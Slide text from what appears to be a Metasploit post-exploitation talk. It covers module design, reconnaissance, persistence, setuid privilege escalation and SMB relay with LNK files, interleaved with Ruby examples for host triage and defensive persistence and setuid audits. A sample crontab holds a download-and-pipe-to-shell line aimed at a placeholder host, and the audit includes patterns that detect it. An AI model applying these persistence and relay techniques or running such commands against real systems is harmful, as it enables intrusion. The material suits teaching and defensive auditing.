12. POST MODULE DESIGN
Should be minimal
• Complexity is hard to debug and maintain
• Do one thing and do it well
– Resource scripts can automate multiple modules
13. POST MODULE DESIGN
Should be readable
• Consistent structure
• Consistent option names
• Consistent output
14. POST MODULE DESIGN
Should be reliable
• Detect relevant variables
• Never crash session/host if you can avoid it
• Clean up
15. POST MODULE DEVELOPMENT
Like Aux modules in many ways
• Define a run() method
• Optional setup(), cleanup() methods
• Have Actions
• Can include Exploit / Auxiliary mixins
• Should report something
17. METASPLOIT POST API
• DSL*-like interface for automating shells
• Abstracts out common stuff
• Platform-agnostic methods for
– Reading/writing binary files
– Running shell commands
– Listing users
*Domain Specific Language
22. PRESENCE - THE MACHINE
• What does this box do?
• What processes are running?
– AV, Tripwire
– ssh-agent, pageant
– Editors
– Database servers
• What does it talk to?
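The three slides above (module structure, the platform-agnostic Post API, and the "presence" checklist) fit together in one piece of code. The following is an added example, not a module from the slides or from the Metasploit project: a post-module-shaped class with setup(), run() and cleanup() that maps running processes to the categories the presence slide lists. It runs against a constructed FakeSession whose cmd_exec returns canned ps output, so it works offline; a real module would inherit these helpers from Msf::Post and its session mixins instead, and the process-name lists are assumptions chosen for the example.

```ruby
# Added example (not from the slides or from Metasploit). A post-module-shaped
# triage check: setup detects the platform, run does one thing, cleanup always
# runs, and a failure in the session never propagates out of run.

# Process names a triage module might watch for (constructed, not exhaustive).
WATCHED_PROCESSES = {
  av_or_integrity: %w[clamd tripwire MsMpEng.exe falcon-sensor],
  key_agents:      %w[ssh-agent pageant.exe gpg-agent],
  editors:         %w[vim emacs nano code.exe],
  databases:       %w[mysqld postgres mongod sqlservr.exe],
}.freeze

# Hypothetical stand-in for a Metasploit session; only cmd_exec is needed here.
class FakeSession
  attr_reader :platform

  def initialize(platform, ps_output)
    @platform = platform
    @ps_output = ps_output # canned process listing (constructed)
  end

  # Mimics the Post API's "run a shell command, get the output" helper.
  def cmd_exec(cmd)
    raise "unsupported command: #{cmd}" unless cmd.start_with?('ps', 'tasklist')
    @ps_output
  end
end

class PresenceCheck
  attr_reader :report, :cleaned_up

  def initialize(session)
    @session = session
    @report = Hash.new { |h, k| h[k] = [] }
    @cleaned_up = false
  end

  # setup(): detect the relevant variable first, here which listing command
  # this platform understands.
  def setup
    @list_cmd = @session.platform == 'windows' ? 'tasklist' : 'ps -eo comm='
  end

  # run(): do one thing, map process names to categories, and report it.
  def run
    setup
    names = process_names(@session.cmd_exec(@list_cmd))
    WATCHED_PROCESSES.each do |category, watched|
      hits = names & watched
      @report[category].concat(hits) unless hits.empty?
    end
    @report
  rescue StandardError => e
    # Never crash the session: degrade to a report that carries the error.
    @report[:errors] << e.message
    @report
  ensure
    cleanup
  end

  # cleanup(): nothing touched disk here, so just record that it ran.
  def cleanup
    @cleaned_up = true
  end

  private

  # Reduce ps/tasklist output to bare process names (first column).
  def process_names(output)
    output.lines.map { |l| l.strip.split(/\s+/).first }.compact.uniq
  end
end

# Constructed sample listing for a Linux box.
SAMPLE_PS = <<~PS
  systemd
  sshd
  ssh-agent
  tripwire
  postgres
  vim
PS

if __FILE__ == $PROGRAM_NAME
  mod = PresenceCheck.new(FakeSession.new('linux', SAMPLE_PS))
  mod.run.each { |category, procs| puts "#{category}: #{procs.join(', ')}" }
end
```

The rescue/ensure pair is the point of the "should be reliable" slide: a dead session produces a report with an errors entry and cleanup still runs, instead of an exception tearing down the session.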
25. TEMPORARY PERSISTENCE
• Reverse http(s) payloads
• Doesn't survive reboot but useful for keeping shells when network is spotty
26. MORE PERMANENT OPTIONS
• Autoruns
– Drop an exe in the right place, maybe mod registry
– Simple, effective
• Task scheduler, cron, launchd
• Enable RDP
• Enable root login for ssh
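From the defender's side, the persistence locations on the slide above are exactly the places to audit. The following is an added example, not from the slides: a small audit over two of them, the sshd PermitRootLogin directive and crontab entries. It takes the file contents as text (constructed samples below) so it runs offline; on a real host you would pass it the contents of sshd_config and the output of crontab -l. The suspicious-entry patterns are assumptions chosen for the example, and the autorun/registry items on the slide are not covered here.

```ruby
# Added example (not from the slides): audit persistence settings from text.

# Constructed sample sshd_config.
SSHD_CONFIG = <<~CFG
  # comment line
  Port 22
  PermitRootLogin yes
  PasswordAuthentication no
CFG

# Constructed sample crontab.
CRONTAB = <<~CRON
  # m h dom mon dow command
  0 3 * * * /usr/bin/backup.sh
  @reboot /tmp/.x/update.sh
  */5 * * * * curl -s http://example.invalid/a | sh
CRON

# Returns the effective PermitRootLogin value; sshd honours the first
# occurrence of a directive, and OpenSSH 7.0+ defaults to prohibit-password.
def sshd_root_login(config_text)
  config_text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    key, value = line.split(/\s+/, 2)
    return (value || '').downcase if key.casecmp?('permitrootlogin')
  end
  'prohibit-password'
end

# Patterns a reviewer would want flagged in a crontab (assumed, not exhaustive).
SUSPICIOUS_CRON = [
  [/\A@reboot\b/, 'runs at boot'],
  [%r{(\A|\s)/(tmp|dev/shm|var/tmp)/}, 'command lives in a world-writable directory'],
  [/\b(curl|wget)\b.*\|\s*(ba)?sh\b/, 'downloads and pipes to a shell'],
].freeze

# Returns [{entry:, reasons:}] for each crontab line matching any pattern.
def audit_crontab(text)
  findings = []
  text.each_line do |raw|
    line = raw.strip
    next if line.empty? || line.start_with?('#')
    reasons = SUSPICIOUS_CRON.select { |re, _| line =~ re }.map(&:last)
    findings << { entry: line, reasons: reasons } unless reasons.empty?
  end
  findings
end

# Combine both checks into one list of findings.
def audit_host(sshd_config:, crontab:)
  findings = audit_crontab(crontab)
  root = sshd_root_login(sshd_config)
  if root == 'yes'
    findings << { entry: "PermitRootLogin #{root}", reasons: ['root may log in over ssh'] }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  audit_host(sshd_config: SSHD_CONFIG, crontab: CRONTAB).each do |f|
    puts "#{f[:entry]}  <- #{f[:reasons].join('; ')}"
  end
end
```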
28. POST-EXPLOITATION EXPLOITATION
• For when you absolutely, positively have to have root
– (and don’t mind the occasional kernel panic)
• We can kinda blur the line between local and remote here
29. $ -> #
• Just like with network exploitation, not always an exploit
• Passwords (sudo)
• Trust relationships (suid executables)
• Misconfiguration (all sorts of shit)
30. DEMO: MULTI/LOCAL/SETUID_NMAP
"Nmap should never be installed with special privileges (e.g. suid root) for security reasons."
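The setuid nmap demo is one instance of the "trust relationships (suid executables)" bullet: a binary that should not carry the setuid bit. The following is an added example, not from the slides, that audits a file listing for setuid-root binaries outside a baseline. The input is a constructed listing in the shape of find / -perm -4000 -printf '%m %u %p\n'; the baseline list is an assumption for the example and would be built from a known-good host in practice.

```ruby
# Added example (not from the slides): find setuid-root binaries that are
# not on a baseline list, using a constructed "mode owner path" listing.

# Assumed baseline of setuid binaries expected on this host.
BASELINE_SUID = %w[/usr/bin/sudo /usr/bin/passwd /usr/bin/su /bin/ping].freeze

SETUID_BIT = 0o4000

# Constructed sample in the shape of: find / -perm -4000 -printf '%m %u %p\n'
SAMPLE_FIND = <<~LIST
  4755 root /usr/bin/sudo
  4755 root /usr/bin/passwd
  4755 root /usr/bin/nmap
  4711 root /usr/local/bin/backup-helper
  2755 root /usr/bin/wall
  4755 games /usr/games/highscore
LIST

# Parse "mode owner path" lines into hashes; mode is read as octal.
def parse_find(text)
  text.each_line.map do |line|
    mode, owner, path = line.strip.split(/\s+/, 3)
    next unless mode && owner && path
    { mode: mode.to_i(8), owner: owner, path: path }
  end.compact
end

# Every path whose mode has the setuid bit, regardless of owner.
def setuid_files(text)
  parse_find(text).select { |f| (f[:mode] & SETUID_BIT) != 0 }.map { |f| f[:path] }
end

# Setuid binaries owned by root that are not on the baseline.
def unexpected_setuid_root(text, baseline = BASELINE_SUID)
  parse_find(text).select do |f|
    (f[:mode] & SETUID_BIT) != 0 && f[:owner] == 'root' && !baseline.include?(f[:path])
  end.map { |f| f[:path] }
end

if __FILE__ == $PROGRAM_NAME
  unexpected_setuid_root(SAMPLE_FIND).each { |p| puts "unexpected setuid root: #{p}" }
end
```

Note that a setgid-only file such as the 2755 wall entry is not reported, and a setuid file owned by a non-root user is visible through setuid_files but not counted as a root trust relationship.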
41. SMB RELAY
[Diagram: Attacker, Target, Victim. Victim calculates challenge response and replies with final authentication packet]
42. SMB RELAY
[Diagram: Attacker, Target, Victim. Attacker logs into Target with Victim's credentials]
43. SMB RELAY
• Well-known attack
• Some mitigations break it, but largely still useful and will be for a long time
44. SMB RELAY + LNK FILE
[Diagram: Attacker, Victim, Target, Compromised File Server; "Create LNK file" on the Compromised File Server]
Drop LNK file (post/windows/escalate/droplnk)
Set up a relay (exploit/windows/smb/smb_relay)
Wait for an Admin to open that directory
45. AUTOMATIC DOMAIN AUTH
• Windows stores creds in memory and does NTLM auth using your current token
• When you do something in the GUI that requires auth, it happens automatically using those creds
• If your user has Local Admin on another box, you can create/start services (usually)